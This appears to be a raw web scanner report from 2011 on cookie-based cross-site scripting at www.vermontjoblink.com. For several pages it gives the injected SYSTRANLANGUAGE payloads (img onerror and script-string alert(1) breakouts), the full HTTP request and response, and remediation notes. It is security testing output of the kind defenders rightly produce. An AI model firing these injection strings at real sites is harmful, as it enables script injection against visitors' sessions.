User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en5fb25"%3balert(1)//0afab1b910d; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:05 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN5FB25";ALERT(1)//0AFAB1B910D\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 990e3"><img%20src%3da%20onerror%3dalert(1)>5f5d51121c was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 990e3"><img src=a onerror=alert(1)>5f5d51121c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/contactus.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en990e3"><img%20src%3da%20onerror%3dalert(1)>5f5d51121c; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:56 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en990e3"><img src=a onerror=alert(1)>5f5d51121c">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2606f"><img%20src%3da%20onerror%3dalert(1)>ce87d810e71 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2606f"><img src=a onerror=alert(1)>ce87d810e71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/employeroverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en2606f"><img%20src%3da%20onerror%3dalert(1)>ce87d810e71; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:38 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en2606f"><img src=a onerror=alert(1)>ce87d810e71">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b6c6"%3balert(1)//2bb717da338 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2b6c6";alert(1)//2bb717da338 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/employeroverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en2b6c6"%3balert(1)//2bb717da338; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:42 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN2B6C6";ALERT(1)//2BB717DA338\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81040"><img%20src%3da%20onerror%3dalert(1)>b72e0d73415 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 81040"><img src=a onerror=alert(1)>b72e0d73415 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/joboverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en81040"><img%20src%3da%20onerror%3dalert(1)>b72e0d73415; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:41 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en81040"><img src=a onerror=alert(1)>b72e0d73415">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f340"%3balert(1)//e611409b0e4 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2f340";alert(1)//e611409b0e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/joboverview.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en2f340"%3balert(1)//e611409b0e4; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:45 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN2F340";ALERT(1)//E611409B0E4\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d5b"><img%20src%3da%20onerror%3dalert(1)>18601d5f451 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as d3d5b"><img src=a onerror=alert(1)>18601d5f451 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/works/jobsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=end3d5b"><img%20src%3da%20onerror%3dalert(1)>18601d5f451; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:37 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="end3d5b"><img src=a onerror=alert(1)>18601d5f451">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a6d8"%3balert(1)//ce7bba5ab0e was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 9a6d8";alert(1)//ce7bba5ab0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/jobsearch.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en9a6d8"%3balert(1)//ce7bba5ab0e; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:40 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN9A6D8";ALERT(1)//CE7BBA5AB0E\">
...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd58c"%3balert(1)//1a305bee659 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as cd58c";alert(1)//1a305bee659 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/works/linkview.cfm?set=JSR HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=encd58c"%3balert(1)//1a305bee659; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
